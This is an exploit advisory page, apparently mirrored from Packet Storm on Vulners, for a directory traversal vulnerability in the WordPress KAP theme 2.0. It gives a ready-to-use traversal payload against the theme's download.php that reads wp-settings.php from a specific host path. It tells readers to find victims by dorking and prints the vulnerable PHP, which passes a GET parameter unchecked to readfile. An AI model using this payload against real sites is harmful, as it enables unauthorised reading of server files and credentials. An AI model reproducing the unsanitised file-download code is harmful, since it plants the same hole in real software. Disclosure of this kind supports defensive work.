Lucene search
K

WordPress KAP Theme 2.0 Directory Traversal

🗓️ 25 Jul 2023 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 269 Views

WordPress KAP Theme 2.0 Directory Traversal Vulnerability, Author: indoushka, Tested on: Windows 10, Mozilla Firefox 66.

Code
`====================================================================================================================================  
| # Title : Wordpress KAP-theme v2.0 Directory Traversal Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) |   
| # Vendor : https://graphicriver.net/ |   
====================================================================================================================================  
  
poc :  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] Use payload : /wp-content/themes/kap/download.php?url=../../../../../../../../../home/kingaport/public_html/wp-settings.php  
  
download.php  
  
<?php  
$file_url = $_GET['url'];   
header('Content-Type: application/octet-stream');  
header("Content-Transfer-Encoding: Binary");   
header("Content-disposition: attachment; filename=\"" . basename($file_url) . "\"");   
readfile($file_url);  
?>  
  
[+] http://127.0.0.1Nokingabdullahportcomsa/wp-content/themes/kap/download.php?url=../../../../../../../../../home/kingaport/public_html/wp-settings.php  
  
Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |  
=======================================================================================================================================  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation